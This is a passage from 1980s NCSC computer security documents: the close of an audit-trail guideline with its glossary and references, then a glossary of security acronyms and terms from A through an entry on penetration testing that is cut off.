a difficult and time-consuming task for the administrator.  Thus,
a selection option is required which may be either a
pre-selection or post-selection option.   

The audit trail information should be sufficient to reconstruct a
complete sequence of security-relevant events and processes for a
system.  To do this, the audit trail shall contain the following 
information:  date and time of the event, user, type of event, 
success or failure of the event, the origin of the request, the
name of the object introduced into the user's address space,
accessed, or deleted from the storage system, and at the B1 class
and above, the sensitivity determination of the object. 

It should be remembered that the audit trail shall be included in
the Trusted Computing Base and shall be accorded the same
protection as the TCB.  The audit trail shall be subject to
strict access controls. 

An effective audit trail is necessary in order to detect and 
evaluate hostile attacks on a system.    

                                22 

GLOSSARY

Administrator - Any one of a group of personnel assigned to 
supervise all or a portion of an ADP system.   

Archive - To file or store records off-line. 

Audit - To conduct the independent review and examination of 
system records and activities. 

Auditor - An authorized individual with administrative duties,
whose duties include selecting the events to be audited on the
system, setting up the audit flags which enable the recording of
those events, and analyzing the trail of audit events.(2) 

Audit Mechanism - The device used to collect, review, and/or
examine system activities. 

Audit Trail - A set of records that collectively provide
documentary evidence of processing used to aid in tracing from
original transactions forward to related records and reports,
and/or backwards from records and reports to their component
source transactions.(1) 

Auditable Event - Any event that can be selected for inclusion in
the audit trail.  These events should include, in addition to 
security-relevant events, events taken to recover the system
after failure and any events that might prove to be
security-relevant at a later time.  

Authenticated User - A user who has accessed an ADP system with a
valid identifier and authentication combination.  

Automatic Data Processing (ADP) System - An assembly of computer 
hardware, firmware, and software configured for the purpose of 
classifying, sorting, calculating, computing, summarizing, 
transmitting and receiving, storing, and retrieving data with a 
minimum of human intervention.(1) 

Category - A grouping of classified or unclassified sensitive 
information, to which an additional restrictive label is applied 
(e.g., proprietary, compartmented information) to signify that 
personnel are granted access to the information only if they have
formal approval or other appropriate authorization.(4)  

Covert Channel - A communication channel that allows a process to 
transfer information in a manner that violates the system's
security policy.(1) 

                                23 

Covert Storage Channel - A covert channel that involves the
direct or indirect writing of a storage location by one process
and the direct or indirect reading of the storage location by
another process.  Covert storage channels typically involve a
finite resource (e.g., sectors on a disk) that is shared by two
subjects at different security levels.(1) 

Covert Timing Channel - A covert channel in which one process 
signals information to another by modulating its own use of
system resources (e.g., CPU time) in such a way that this
manipulation affects the real response time observed by the
second process.(1) 

Flaw - An error of commission, omission or oversight in a system 
that allows protection mechanisms to be bypassed.(1) 

Object - A passive entity that contains or receives information. 
Access to an object potentially implies access to the information
it contains.  Examples of objects are:  records, blocks, pages, 
segments, files, directories, directory trees and programs, as
well as bits, bytes, words, fields, processors, video displays, 
keyboards, clocks, printers, network nodes, etc.(1) 

Post-Selection - Selection, by authorized personnel, of specified
events that had been recorded on the audit trail. 

Pre-Selection - Selection, by authorized personnel, of the
auditable events that are to be recorded on the audit trail. 

Security Level - The combination of a hierarchical classification
and a set of non-hierarchical categories that represents the 
sensitivity of information.(1) 

Security Policy - The set of laws, rules, and practices that 
regulate how an organization manages, protects, and distributes 
sensitive information.(1) 

Security-Relevant Event - Any event that attempts to change the  
security state of the system,  (e.g., change discretionary access
controls, change the security level of the subject, change user  
password, etc.).  Also, any event that attempts to violate the  
security policy of the system, (e.g., too many attempts to login,
attempts to violate the mandatory access control limits of a
device, attempts to downgrade a file, etc.).(1) 

Sensitive Information - Information that, as determined by a 
competent authority, must be protected because its unauthorized 
disclosure, alteration, loss, or destruction will at least cause 
perceivable damage to someone or something.(1) 

                                24

Subject - An active entity, generally in the form of a person,  
process, or device that causes information to flow among objects
or changes the system state.  Technically, a process/domain
pair.(1) 

Subject Sensitivity Level - The sensitivity level of the objects
to which the subject has both read and write access.  A subject's
sensitivity level must always be less than or equal to the
clearance of the user the subject is associated with.(4) 

System Security Administrator - The person responsible for the 
security of an Automated Information System and having the
authority to enforce the security safeguards on all others who
have access to the Automated Information System.(4)  

Trusted Computing Base (TCB) - The totality of protection
mechanisms within a computer system -- including hardware,
firmware, and software -- the combination of which is responsible
for enforcing a security policy.  A TCB consists of one or more
components that together enforce a unified security policy over a
product or system.  The ability of a TCB to correctly enforce a
security policy depends solely on the mechanisms within the TCB
and on the correct input by system administrative personnel of
parameters (e.g., a user's clearance) related to the security
policy.(1) 

User - Any person who interacts directly with a computer
system.(1) 

                                25 

REFERENCES 

1.    National Computer Security Center, DoD Trusted Computer    
      System Evaluation Criteria, DoD, DoD 5200.28-STD, 1985. 

2.    Gligor, Virgil D., "Guidelines for Trusted Facility        
      Management and Audit," University of Maryland, 1985. 

3.    Brown, Leonard R., "Guidelines for Audit Log Mechanisms in 
      Secure Computer Systems," Technical Report                 
      TR-0086A(2770-29)-1, The Aerospace Corporation, 1986. 

4.    Subcommittee on Automated Information System Security,     
      Working Group #3, "Dictionary of Computer Security         
      Terminology," 23 November 1986. 

5.    National Computer Security Center, Criterion               
      Interpretation, Report No. C1-C1-02-87, 1987. 

                                26����������������������

Glossary of Computer Security Acronyms

	

		GLOSSARY OF COMPUTER SECURITY ACRONYMS

AIS	Automated Information System

COMPUSEC	Computer Security

COMSEC	Communications Security

CSTVRP	Computer Security Technical Vulnerability Reporting Program

DAA	Designated Approving Authority

DAC	Discretionary Access Control

DES	Data Encryption Standard

DPL	Degausser Products List

DTLS	Descriptive Top-Level Specification

EPL	Evaluated Products List

ETL	Endorsed Tools List

FTLS	Formal Top-Level Specification

ISSO	Information System Security Officer

MAC	Mandatory Access Control

NCSC	National Computer Security Center

NTISSC 	National Telecommunications and Information Systems Security 
	Committee

OPSEC	Operations Security

PPL	Preferred Products List

SAISS	Subcommittee on Automated Information Systems Security of NTISSC

SSO	System Security Officer

STS	Subcommittee on Telecommunications Security of NTISSC

TCB	Trusted Computing Base

TCSEC	DoD Trusted Computer System Evaluation Criteria

		 GLOSSARY OF COMPUTER SECURITY TERMS

*-property (or star property)

A Bell-La Padula security model rule allowing a subject write access to an
object only if the security level of the object dominates the security level
of the subject.  Also called confinement property.

-A-

acceptance inspection

	The final inspection to determine whether or not a facility or
system meets the specified technical and performance standards.  Note: This
inspection is held immediately after facility and software testing and is the
basis for commissioning or accepting the information system.

access

	A specific type of interaction between a subject and an object that
results in the flow of information from one to the other.

access control

	The process of limiting access to the resources of a system only to
authorized programs, processes, or other systems (in a network).  Synonymous
with controlled access and limited access.

access control mechanism

	Hardware or software features, operating procedures, management
procedures, and various combinations of these designed to detect and prevent
unauthorized access and to permit authorized access in an automated system.

access level

	The hierarchical portion of the security level used to identify the
sensitivity of data and the clearance or authorization of users.  Note: The
access level, in conjunction with the nonhierarchical categories, forms the
sensitivity label of an object.  See category, security level, and sensitivity
label.

access list

	A list of users, programs, and/or processes and the specifications
of access categories to which each is assigned.

access period

	A segment of time, generally expressed on a daily or weekly basis,
during which access rights prevail.

access port

	A logical or physical identifier that a computer uses to distinguish
different terminal input/output data streams.

access type

	The nature of an access right to a particular device, program, or
file (e.g., read, write, execute, append, modify, delete, or create).

accountability

	The property that enables activities on a system to be traced to
individuals who may then be held responsible for their actions.

accreditation

	A formal declaration by the DAA that the AIS is approved to operate
in a particular security mode using a perscribed set of safeguards.
Accreditation is the official management authorization for operation of an AIS
and is based on the certification process as well as other management
considerations.  The accreditation statement affixes security responsibility
with the DAA and shows that due care has been taken for security.

accreditation authority

	Synonymous with Designated Approving Authority.

add-on security

	The retrofitting of protection mechanisms, implemented by hardware
or software.

administrative security

	The management constraints and supplemental controls established to
provide an acceptable level of protection for data.  Synonymous with
procedural security.

assurance

	A measure of confidence that the security features and architecture
of an AIS accurately mediate and enforce the security policy.

attack

	The act of trying to bypass security controls on a system.  An
attack may be active, resulting in the alteration of data; or passive,
resulting in the release of data.  Note: The fact that an attack is made does
not necessarily mean that it will succeed.  The degree of success depends on
the vulnerability of the system or activity and the effectiveness of existing
countermeasures.

audit trail

	A chronological record of system activities that is sufficient to
enable the reconstruction, reviewing, and examination of the sequence of
environments and activities surrounding or leading to an operation, a
procedure, or an event in a transaction from its inception to final results.

authenticate

	(1) To verify the identity of a user, device, or other entity in a
computer system, often as a prerequisite to allowing access to resources in a
system.

	 (2) To verify the integrity of data that have been stored,
transmitted, or otherwise exposed to possible unauthorized modification.

authenticator

	The means used to confirm the identity or to verify the eligibility
of a station, originator, or individual.

authorization

	The granting of access rights to a user, program, or process.

automated data processing security

	Synonymous with automated information systems security.

automated information system (AIS)

	An assembly of computer hardware, software and/or firmware
configured to collect, create, communicate, compute, disseminate, process,
store, and/or control data or information.

automated information system security

	Measures and controls that protect an AIS against denial of service
and unauthorized (accidental or intentional) disclosure, modification, or
destruction of AISs and data.  AIS security includes consideration of all
hardware and/or software functions, characteristics and/or features;
operational procedures, accountability procedures, and access controls at the
central computer facility, remote computer, and terminal facilities;
management constraints; physical structures and devices; and personnel and
communication controls needed to provide an acceptable level of risk for the
AIS and for the data and information contained in the AIS.  It includes the
totality of security safeguards needed to provide an acceptable protection
level for an AIS and for data handled by an AIS.

automated security monitoring

	The use of automated procedures to ensure that security controls are
not circumvented.

availability of data

  	The state when data are in the place needed by the user, at the time
the user needs them, and in the form needed by the user.

-B-

back door

	Synonymous with trap door.

backup plan

	Synonymous with contingency plan.

Bell-La Padula model

	A formal state transition model of computer security policy that
describes a set of access control rules.  In this formal model, the entities
in a computer system are divided into abstract sets of subjects and objects.
The notion of a secure state is defined, and it is proven that each state
transition preserves security by moving from secure state to secure state,
thereby inductively proving that the system is secure.  A system state is
defined to be "secure" if the only permitted access modes of subjects to
objects are in accordance with a specific security policy.  In order to
determine whether or not a specific access mode is allowed, the clearance of a
subject is compared to the classification of the object, and a determination
is made as to whether the subject is authorized for the specific access mode.
See star property (*-property) and simple security property.

benign environment

	A nonhostile environment that may be protected from external hostile
elements by physical, personnel, and procedural security countermeasures.

between-the-lines entry

	Unauthorized access obtained by tapping the temporarily inactive
terminal of a legitimate user.  See piggyback.

beyond A1

	A level of trust defined by the DoD Trusted Computer System
Evaluation Criteria (TCSEC) that is beyond the state-of-the-art technology
available at the time the criteria were developed.  It includes all the
A1-level features plus additional ones not required at the A1 level.

browsing

	The act of searching through storage to locate or acquire
information without necessarily knowing of the existence or the format of the
information being sought.

-C-

call back

	A procedure for identifying a remote terminal.  In a call back, the
host system disconnects the caller and then dials the authorized telephone
number of the remote terminal to reestablish the connection.  Synonymous with
dial back.

capability

	A protected identifier that both identifies the object and specifies
the access rights to be allowed to the accessor who possesses the capability.
In a capability-based system, access to protected objects such as files is
granted if the would-be accessor possesses a capability for the object.

category

	A restrictive label that has been applied to classified or
unclassified data as a means of increasing the protection of the data and
further restricting access to the data.

certification

	The comprehensive evaluation of the technical and nontechnical
security features of an AIS and other safeguards, made in support of the
accreditation process, that establishes the extent to which a particular
design and implementation meet a specified set of security requirements.

closed security environment

	An environment in which both of the following conditions hold true:
(1) Application developers (including maintainers) have sufficient clearances
and authorizations to provide an acceptable presumption that they have not
introduced malicious logic.  (2) Configuration control provides sufficient
assurance that applications and the equipment are protected against the
introduction of malicious logic prior to and during the operation of system
applications.

communications security (COMSEC)

	Measures taken to deny unauthorized persons information derived from
telecommunications of the U.S.  Government concerning national security, and
to ensure the authenticity of such telecommunicatons.  Communications security
includes cryptosecurity, transmission security, emission security, and
physical security of communications security material and information.

compartment

	A class of information that has need-to-know access controls beyond
those normally provided for access to Confidential, Secret or Top Secret
information.

compartmented security mode

	See modes of operation.

compromise

	A violation of the security policy of a system such that
unauthorized disclosure of sensitive information may have occurred.

compromising emanations

	Unintentional data-related or intelligence-bearing signals that, if
intercepted and analyzed, disclose the information transmission received,
handled, or otherwise processed by any information processing equipment.  See
TEMPEST.

computer abuse

	The misuse, alteration, disruption or destruction of data processing
resources.  The key aspect is that it is intentional and improper.

computer cryptography

	The use of a crypto-algorithm in a computer, microprocessor, or
microcomputer to perform encryption or decryption in order to protect
information or to authenticate users, sources, or information.

computer fraud

	Computer-related crimes involving deliberate misrepresentation,
alteration or disclosure of data in order to obtain something of value
(usually for monetary gain).  A computer system must have been involved in the
perpetration or coverup of the act or series of acts.  A computer system might
have been involved through improper manipulation of input data; output or
results; applications programs; data files; computer operations;
communications; or computer hardware, systems software, or firmware.

 computer security (COMPUSEC) 

	Synonymous with automated information systems security.

computer security subsystem

	A device designed to provide limited computer security features in a
larger system environment.

Computer Security Technical Vulnerability Reporting Program (CSTVRP)

	A program that focuses on technical vulnerabilities in commercially
available hardware, firmware and software products acquired by DoD.  CSTVRP
provides for the reporting, cataloging, and discreet dissemination of
technical vulnerability and corrective measure information to DoD components
on a need-to-know basis.

concealment system

	A method of achieving confidentiality in which sensitive information
is hidden by embedding it in irrelevant data.

confidentiality

	 The concept of holding sensitive data in confidence, limited to an
appropriate set of individuals or organizations.

configuration control

	The process of controlling modifications to the system's hardware,
firmware, software, and documentation that provides sufficient assurance that
the system is protected against the introduction of improper modifications
prior to, during, and after system implementation.  Compare configuration
management.

configuration management

	The management of security features and assurances through control
of changes made to a system's hardware, software, firmware, documentation,
test, test fixtures and test documentation throughout the development and
operational life of the system.  Compare configuration control.

confinement

	The prevention of the leaking of sensitive data from a program.

confinement channel

	Synonymous with covert channel.

confinement property

	Synonymous with star property (*-property).

contamination

	The intermixing of data at different sensitivity and need-to-know
levels.  The lower level data is said to be contaminated by the higher level
data; thus, the contaminating (higher level) data may not receive the required
level of protection.

contingency plan

	A plan for emergency response, backup operations, and post-disaster
recovery maintained by an activity as a part of its security program that will
ensure the availability of critical resources and facilitate the continuity of
operations in an emergency situation.  Synonymous with disaster plan and
emergency plan.

control zone

	The space, expressed in feet of radius, surrounding equipment
processing sensitive information, that is under sufficient physical and
technical control to preclude an unauthorized entry or compromise.

controlled access

	See access control.

controlled sharing

	The condition that exists when access control is applied to all
users and components of a system.

cost-risk analysis

	The assessment of the costs of providing data protection for a
system versus the cost of losing or compromising the data.

countermeasure

	Any action, device, procedure, technique, or other measure that
reduces the vulnerability of or threat to a system.

covert channel

	A communications channel that allows two cooperating processes to
transfer information in a manner that violates the system's security policy.
Synonymous with confinement channel.

covert storage channel

	A covert channel that involves the direct or indirect writing of a
storage location by one process and the direct or indirect reading of the
storage location by another process.  Covert storage channels typically
involve a finite resource (e.g., sectors on a disk) that is shared by two
subjects at different security levels.

covert timing channel

	A covert channel in which one process signals information to another
by modulating its own use of system resources (e.g., CPU time) in such a way
that this manipulation affects the real response time observed by the second
process.

Criteria

	See DoD Trusted Computer System Evaluation Criteria.

crypto-algorithm 

  	 A well-defined procedure or sequence of rules or steps used to
produce a key stream or cipher text from plain text and vice versa.

cryptography

  	The principles, means and methods for rendering information
unintelligible, and for restoring encrypted information to intelligible form.

cryptosecurity

 	The security or protection resulting from the proper use of
technically sound cryptosystems.

-D-

Data Encryption Standard (DES)

	A cryptographic algorithm for the protection of unclassified data,
published in Federal Information Processing Standard (FIPS) 46.  The DES,
which was approved by the National Institute of Standards and Technology, is
intended for public and government use.

data flow control

	Synonymous with  information flow control.

data integrity

	The property that data meet an a priori expectation of quality.

data security

	The protection of data from unauthorized (accidental or intentional)
modification, destruction, or disclosure.

declassification of AIS storage media

	An administrative decision or procedure to remove or reduce the
security classification of the subject media.

dedicated security mode

	See modes of operation.

default classification

	A temporary classification reflecting the highest classification
being processed in a system.  The default classification is included in the
caution statement affixed to the object.

degauss

	To reduce magnetic flux density to zero by applying a reverse
magnetizing field.

degausser

	An electrical device that can generate a magnetic field for the
purpose of degaussing magnetic storage media.  Degausser Products List (DPL)

  	 A list of commercially produced degaussers that meet National
Security Agency specifications.  This list is included in the NSA Information
Systems Security Products and Services Catalogue, and is available through the
Government Printing Office.

denial of service

	Any action or series of actions that prevent any part of a system
from functioning in accordance with its intended purpose.  This includes any
action that causes unauthorized destruction, modification, or delay of
service.  Synonymous with interdiction.

Descriptive Top-Level Specification (DTLS)

	A top-level specification that is written in a natural language
(e.g., English), an informal design notation, or a combination of the two.

Designated Approving Authority (DAA)

	The official who has the authority to decide on accepting the
security safeguards prescribed for an AIS or that official who may be
responsible for issuing an accreditation statement that records the decision
to accept those safeguards.

dial back

	Synonymous with  call back.

dial-up

	The service whereby a computer terminal can use the telephone to
initiate and effect communication with a computer.

disaster plan

	Synonymous with contingency plan. 

discretionary access control (DAC)

	A means of restricting access to objects based on the identity and
need-to-know of the user, process and/or groups to which they belong.  The
controls are discretionary in the sense that a subject with a certain access
permission is capable of passing that permission (perhaps indirectly) on to
any other subject.  Compare mandatory access control.

DoD Trusted Computer System Evaluation Criteria (TCSEC)

	A document published by the National Computer Security Center
containing a uniform set of basic requirements and evaluation classes for
assessing degrees of assurance in the effectiveness of hardware and software
security controls built into systems.  These criteria are intended for use in
the design and evaluation of systems that will process and/or store sensitive
or classified data.  This document is Government Standard DoD 5200.28-STD and
is frequently referred to as "The Criteria" or "The Orange Book."

domain

	The unique context (e.g., access control parameters) in which a
program is operating; in effect, the set of objects that a subject has the
ability to access.  See process and subject.

dominate

	Security level S1 is said to dominate security level S2 if the
hierarchical classification of S1 is greater than or equal to that of S2 and
the nonhierarchical categories of S1 include all those of S2 as a subset.  

-E-

emanations

	See compromising emanations.

embedded system

	A system that performs or controls a function, either in whole or in
part, as an integral element of a larger system or subsystem.

emergency plan

	Synonymous with contingency plan.

emission security

	The protection resulting from all measures taken to deny
unauthorized persons information of value that might be derived from intercept
and from an analysis of compromising emanations from systems.

end-to-end encryption

	The protection of information passed in a telecommunications system
by cryptographic means, from point of origin to point of destination.

Endorsed Tools List (ETL)

	The list of formal verification tools endorsed by the NCSC for the
development of systems with high levels of trust.

Enhanced Hierarchical Development Methodology

	An integrated set of tools designed to aid in creating, analyzing,
modifying, managing, and documenting program specifications and proofs.  This
methology includes a specification parser and typechecker, a theorem prover,
and a multi-level security checker.  Note: This methodology is not based upon
the Hierarchical Development Methodology.

entrapment

	The deliberate planting of apparent flaws in a system for the
purpose of detecting attempted penetrations.

environment

	The aggregate of external procedures, conditions, and objects that
affect the development, operation, and maintenance of a system.

erasure

	A process by which a signal recorded on magnetic media is removed.
Erasure is accomplished in two ways: (1) by alternating current erasure, by
which the information is destroyed by applying an alternating high and low
magnetic field to the media; or (2) by direct current erasure, by which the
media are saturated by applying a unidirectional magnetic field.

Evaluated Products List (EPL)

	A list of equipments, hardware, software, and/or firmware that have
been evaluated against, and found to be technically compliant, at a particular
level of trust, with the DoD TCSEC by the NCSC.  The EPL is included in the
National Security Agency Information Systems Security Products and Services
Catalogue, which is available through the Government Printing Office.

executive state

	One of several states in which a system may operate and the only one
in which certain privileged instructions may be executed.  Such instructions
cannot be executed when the system is operating in other (e.g., user) states.
Synonymous with supervisor state.

exploitable channel

	Any information channel that is usable or detectable by subjects
external to the trusted computing base whose purpose is to violate the
security policy of the system.  See covert channel.

-F-

fail safe

	Pertaining to the automatic protection of programs and/or processing
systems to maintain safety when a hardware or software failure is detected in
a system.

fail soft

	Pertaining to the selective termination of affected nonessential
processing when a hardware or software failure is detected in a system.

failure access

	An unauthorized and usually inadvertent access to data resulting
from a hardware or software failure in the system.

failure control

	The methodology used to detect and provide fail-safe or fail-soft
recovery from hardware and software failures in a system.

fault

	A condition that causes a device or system component to fail to
perform in a required manner.

fetch protection

	A system-provided restriction to prevent a program from accessing
data in another user's segment of storage.

file protection

	The aggregate of all processes and procedures in a system designed
to inhibit unauthorized access, contamination, or elimination of a file.

file security

	The means by which access to computer files is limited to authorized
users only.

flaw hypothesis methodology

	A systems analysis and penetration technique in which specifications
and documentation for the system are analyzed and then flaws in the system are
hypothesized.  The list of hypothesized flaws is then prioritized on the basis
of the estimated probability that a flaw exists and, assuming a flaw does
exist, on the ease of exploiting it, and on the extent of control or
compromise it would provide.  The prioritized list is used to direct a
penetration attack against the system.

flow control

	See information flow control.

formal access approval

	Documented approval by a data owner to allow access to a particular
category of information.

Formal Development Methodology

	A collection of languages and tools that enforces a rigorous method
of verification.  This methodology uses the Ina Jo specification language for
successive stages of system development, including identification and modeling
of requirements, high-level design, and program design.

formal proof

	A complete and convincing mathematical argument, presenting the full
logical justification for each proof step, for the truth of a theorem or set
of theorems.

formal security policy model

	A mathematically precise statement of a security policy.  To be
adequately precise, such a model must represent the initial state of a system,
the way in which the system progresses from one state to another, and a
definition of a "secure" state of the system.  To be acceptable as a basis for
a TCB, the model must be supported by a formal proof that if the initial state
of the system satisfies the definition of a "secure" state and if all
assumptions required by the model hold, then all future states of the system
will be secure.  Some formal modeling techniques include: state transition
models, denotational semantics models, and algebraic specification models.
See Bell-La Padula model and security policy model.

Formal Top-Level Specification (FTLS)

	A top-level specification that is written in a formal mathematical
language to allow theorems showing the correspondence of the system
specification to its formal requirements to be hypothesized and formally
proven.  formal verification

	The process of using formal proofs to demonstrate the consistency
between a formal specification of a system and a formal security policy model
(design verification) or between the formal specification and its high level
program implementation (implementation verification).

front-end security filter

	A security filter, which could be implemented in hardware or
software, that is logically separated from the remainder of the system to
protect the system's integrity.

functional testing

	The segment of security testing in which the advertised security
mechanisms of the system are tested, under operational conditions, for correct
operation.

-G-

granularity

	An expression of the relative size of a data object; e.g.,
protection at the file level is considered coarse granularity, whereas
protection at field level is considered to be of a finer granularity.

guard

	A processor that provides a filter between two disparate systems
operating at different security levels or between a user terminal and a data
base to filter out data that the user is not authorized to access.

Gypsy Verification Environment

	An integrated set of tools for specifying, coding, and verifying
programs written in the Gypsy language, a language similar to Pascal which has
both specification and programming features.  This methology includes an
editor, a specification processor, a verification condition generator, a
user-directed theorem prover, and an information flow tool.

-H-

handshaking procedure

	A dialogue between two entities (e.g., a user and a computer, a
computer and another computer, or a program and another program) for the
purpose of identifying and authenticating the entities to one another.

Hierarchical Development Methodology

	A methodology for specifying and verifying the design programs
written in the Special specification language.  The tools for this methodology
include the Special specification processor, the Boyer-Moore theorem prover,
and the Feiertag information flow tool.

host to front-end protocol

	A set of conventions governing the format and control of data that
are passed from a host to a front-end machine.  

-I-

 identification

	The process that enables recognition of an entity by a system,
generally by the use of unique machine-readable user names.

impersonating

	Synonymous with spoofing.

incomplete parameter checking

	A system design flaw that results when all parameters have not been
fully anticipated for accuracy and consistency, thus making the system
vulnerable to penetration.

individual accountability

	The ability to associate positively the identity of a user with the
time, method, and degree of access to a system.

information flow control

	A procedure to ensure that information transfers within a system are
not made from a higher security level object to an object of a lower security
level.  See covert channel, simple security property, star property
(*-property).  Synonymous with data flow control and flow control.

Information System Security Officer (ISSO)

 	The person responsible to the DAA for ensuring that security is
provided for and implemented throughout the life cycle of an AIS from the
beginning of the concept development plan through its design, development,
operation, maintenance, and secure disposal.

Information Systems Security Products and Services Catalogue

 	A catalogue issued quarterly by the National Security Agency that
incorporates the DPL, EPL, ETL, PPL and other security product and service
lists.  This catalogue is available through the U.S.  Government Printing
Office, Washington, DC 20402, (202) 783-3238.

integrity

	Sound, unimpaired or perfect condition.

interdiction

	See denial of service.

internal security controls

	Hardware, firmware, and software features within a system that
restrict access to resources (hardware, software, and data) to authorized
subjects only (persons, programs, or devices).

isolation

	The containment of subjects and objects in a system in such a way
that they are separated from one another, as well as from the protection
controls of the operating system.  

-J-

This document contains no entries beginning with the letter. 

-K-

This document contains no entries beginning with the letter.

-L-

least privilege

	The principle that requires that each subject be granted the most
restrictive set of privileges needed for the performance of authorized tasks.
The application of this principle limits the damage that can result from
accident, error, or unauthorized use.

limited access

	Synonymous with access control.

list-oriented

	A computer protection system in which each protected object has a
list of all subjects authorized to access it.  Compare ticket-oriented.

lock-and-key protection system

	A protection system that involves matching a key or password with a
specific access requirement.

logic bomb

	A resident computer program that triggers the perpetration of an
unauthorized act when particular states of the system are realized.

loophole

	An error of omission or oversight in software or hardware that
permits circumventing the system security policy.  

-M-

magnetic remanence

	A measure of the magnetic flux density remaining after removal of
the applied magnetic force.  Refers to any data remaining on magnetic storage
media after removal of the power.

maintenance hook

	Special instructions in software to allow easy maintenance and
additional feature development.  These are not clearly defined during access
for design specification.  Hooks frequently allow entry into the code at
unusual points or without the usual checks, so they are a serious security
risk if they are not removed prior to live implementation.  Maintenance hooks
are special types of trap doors.

malicious logic

	Hardware, software, or firmware that is intentionally included in a
system for an unauthorized purpose; e.g., a Trojan horse.

mandatory access control (MAC)

	A means of restricting access to objects based on the sensitivity
(as represented by a label) of the information contained in the objects and
the formal authorization (i.e., clearance) of subjects to access information
of such sensitivity.  Compare discretionary access control.

masquerading

	Synonymous with spoofing.

mimicking

	Synonymous with spoofing.

modes of operation

	A description of the conditions under which an AIS functions, based
on the sensitivity of data processed and the clearance levels and
authorizations of the users.  Four modes of operation are authorized:

		(1)  Dedicated Mode
		An AIS is operating in the dedicated mode when each user
with direct or indirect individual access to the AIS, its peripherals, remote
terminals, or remote hosts, has all of the following: 
			a.  A valid personnel
clearance for all information on the system.
			b.  Formal access approval for, and has signed
nondisclosure agreements for all the information stored and/or processed
(including all compartments, subcompartments and/or special access programs).
			c.  A valid need-to-know for all information
contained within the system.

		(2)  System-High Mode
		An AIS is operating in the system-high mode when each user
with direct or indirect access to the AIS, its peripherals, remote terminals,
or remote hosts has all of the following:
			a.  A valid personnel clearance for all
information on the AIS.
			b.  Formal access approval for, and has signed
nondisclosure agreements for all the information stored and/or processed
(including all compartments, subcompartments, and/or special access programs).

			c.  A valid need-to-know for some of the
information contained within the AIS.

		(3)  Compartmented Mode
		An AIS is operating in the compartmented mode when each
user with direct or indirect access to the AIS, its peripherals, remote
terminals, or remote hosts, has all of the following:
			a.  A valid personnel clearance for the most
restricted information processed in the AIS.
			b.  Formal access approval for, and has signed
nondisclosure agreements for that information to which he/she is to have
access.
			c.  A valid need-to-know for that information to
which he/she is to have access.

		(4)  Multilevel Mode
		An AIS is operating in the multilevel mode when all the
following statements are satisfied concerning the users with direct or
indirect access to the AIS, its peripherals, remote terminals, or remote
hosts:
			a.  Some do not have a valid personnel clearance
for all the information processed in the AIS.
			b.  All have the proper clearance and have the
appropriate formal access approval for that information to which he/she is to
have access.
			c.  All have a valid need-to-know for that
information to which they are to have access.

multilevel device

	A device that is used in a manner that permits it to simultaneously
process data of two or more security levels without risk of compromise.  To
accomplish this, sensitivity labels are normally stored on the same physical
medium and in the same form (i.e., machine-readable or human-readable) as the
data being processed.

multilevel secure

	A class of system containing information with different
sensitivities that simultaneously permits access by users with different
security clearances and needs-to-know, but prevents users from obtaining
access to information for which they lack authorization.

multilevel security mode

	See modes of operation.

multiple access rights terminal

	A terminal that may be used by more than one class of users; for
example, users with different access rights to data.

multiuser mode of operation

	A mode of operation designed for systems that process sensitive
unclassified information in which users may not have a need-to-know for all
information processed in the system.  This mode is also for microcomputers
processing sensitive unclassified information that cannot meet the
requirements of the stand-alone mode of operation.

mutually suspicious

	The state that exists between interacting processes (subsystems or
programs) in which neither process can expect the other process to function
securely with respect to some property.

-N-

National Computer Security Assessment Program

	A program designed to evaluate the interrelationship of empirical
data of computer security infractions and critical systems profiles, while
comprehensively incorporating information from the CSTVRP.  The assessment
will build threat and vulnerability scenarios that are based on a collection
of facts from relevant reported cases.  Such scenarios are a powerful,
dramatic, and concise form of representing the value of loss experience
analysis.

National Computer Security Center (NCSC)

	Originally named the DoD Computer Security Center, the NCSC is
responsible for encouraging the widespread availability of trusted computer
systems throughout the Federal Government.

National Security Decision Directive 145 (NSDD 145)

	Signed by President Reagan on l7 September l984, this directive is
entitled "National Policy on Telecommunications and Automated Information
Systems Security." It provides initial objectives, policies, and an
organizational structure to guide the conduct of national activities toward
safeguarding systems that process, store, or communicate sensitive
information; establishes a mechanism for policy development; and assigns
implementation responsibilities.

National Telecommunications and Information Systems Security Advisory
Memoranda/ Instructions (NTISSAM, NTISSI)

	NTISS Advisory Memoranda and Instructions provide advice,
assistance, or information of general interest on telecommunications and
systems security to all applicable federal departments and agencies.
NTISSAMs/NTISSIs are promulgated by the National Manager for
Telecommunications and Automated Information Systems Security and are
recommendatory.

National Telecommunications and Information System Security Directives (NTISSD)

	NTISS Directives establish national-level decisions relating to
NTISS policies, plans, programs, systems, or organizational delegations of
authority.  NTISSDs are promulgated by the Executive Agent of the Government
for Telecommunications and Information Systems Security, or by the Chairman of
the NTISSC when so delegated by the Executive Agent.  NTISSDs are binding upon
all federal departments and agencies.

need-to-know

	The necessity for access to, knowledge of, or possession of specific
information required to carry out official duties.

network front end

	A device that implements the necessary network protocols, including
security-related protocols, to allow a computer system to be attached to a
network.

NSDD 145

 	See National Security Decision Directive 145.

-O-

object

	A passive entity that contains or receives information.  Access to
an object potentially implies access to the information it contains.  Examples
of objects are: records, blocks, pages, segments, files, directories,
directory trees, and programs, as well as bits, bytes, words, fields,
processors, video displays, keyboards, clocks, printers, and network nodes.

object reuse

	The reassignment and reuse of a storage medium (e.g., page frame,
disk sector, magnetic tape) that once contained one or more objects.  To be
securely reused and assigned to a new subject, storage media must contain no
residual data (magnetic remanence) from the object(s) previously contained in
the media.

open security environment

	An environment that includes those systems in which at least one of
the following conditions holds true: (l) Application developers (including
maintainers) do not have sufficient clearance or authorization to provide an
acceptable presumption that they have not introduced malicious logic.  (2)
Configuration control does not provide sufficient assurance that applications
are protected against the introduction of malicious logic prior to and during
the operation of system applications.

Operations Security (OPSEC)

	An analytical process by which the U.S.  Government and its
supporting contractors can deny to potential adversaries information about
capabilities and intentions by identifying, controlling, and protecting
evidence of the planning and execution of sensitive activities and operations.

Orange Book 

	Alternate name for DoD Trusted Computer Security Evaluation
Criteria.

overt channel

	A path within a computer system or network that is designed for the
authorized transfer of data.  Compare covert channel.

overwrite procedure

	A stimulation to change the state of a bit followed by a known
pattern.  See magnetic remanence.

-P-

partitioned security mode

	A mode of operation wherein all personnel have the clearance but not
necessarily formal access approval and need-to-know for all information
contained in the system.  Not to be confused with compartmented security mode.

password

	A protected/private character string used to authenticate an
identity.

penetration

	The successful act of bypassing the security mechanisms of a system.

penetration signature

	The characteristics or identifying marks that may be produced by a
penetration.

penetration study

	A study to determine the feasibility and methods for defeating
controls of a system.

penetration testing

	The portion of security testing in which the evaluators attempt to
